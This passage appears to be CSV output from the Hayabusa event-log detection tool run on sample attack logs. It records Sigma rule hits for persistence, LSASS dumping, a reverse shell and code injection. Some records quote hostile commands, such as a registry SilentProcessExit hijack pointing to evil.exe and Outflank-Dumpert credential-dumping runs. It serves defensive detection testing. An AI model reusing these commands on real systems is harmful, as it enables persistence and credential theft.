NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v MonitorProcess /d ""C:\windows\temp\evil.exe"" : Path: 
C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:43.944 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:45.694 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:55.397 +09:00,IEWIN7,1,informational,Process Creation,"Command: notepad : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:58.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe : Path: C:\Windows\Temp\evil.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 1340 -i 1352 -e 1352 -c 0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:01.928 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe : Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: taskeng.exe {9AAB3F76-4849-4F03-9560-B020B4D0233D} S-1-5-18:NT 
AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:01.990 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe : Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:02.350 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe -check plugin : Path: C:\Windows\System32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe : User: IEWIN7\IEUser : Parent Command: taskeng.exe {CF661A9C-C1B0-45D5-BC80-11E48F3A0B96} S-1-5-21-3583694148-1414552638-2922671848-1000:IEWIN7\IEUser:Interactive:LUA[1],rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:10.334 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:11.694 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe : Path: C:\Windows\Temp\evil.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 3020 -i 2396 -e 2396 -c 
0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 17:07:42.331 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\NETSTAT.EXE"" -na : Path: C:\Windows\System32\NETSTAT.EXE : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:42.331 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.909 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.909 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.925 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.925 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:52.956 +09:00,IEWIN7,1,informational,Process 
Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:52.956 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:52.956 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:58.816 +09:00,IEWIN7,1,informational,Process Creation,"Command: systeminfo : Path: C:\Windows\System32\systeminfo.exe : User: IEWIN7\IEUser : Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: Outflank-Dumpert.exe : Path: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump 
Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.128 +09:00,alice.insecurebank.local,1,informational,Process Creation,"Command: rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump : Path: C:\Windows\System32\rundll32.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.264 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.729 
+09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.749 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: AndrewSpecial.exe : Path: C:\Users\administrator\Desktop\AndrewSpecial.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:36:51.682 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-07-04 05:39:29.223 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\notepad.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,Rundll32 Without Parameters,,rules/sigma/process_creation/win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:PowerShell/Powersploit.M : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:XML/Exeselrun.gen!A : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl : Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat : Severity: High : Type: Tool : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Backdoor:ASP/Ace.T : Severity: Severe : Type: Backdoor : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx : Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:Win32/Sehyioa.A!cl : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.275 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat : Severity: High : Type: Tool : User: MSEDGEWIN10\IEUser : Path: containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); 
file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.900 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.902 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.952 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 23:42:51.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA21C70 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:42:53.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" 
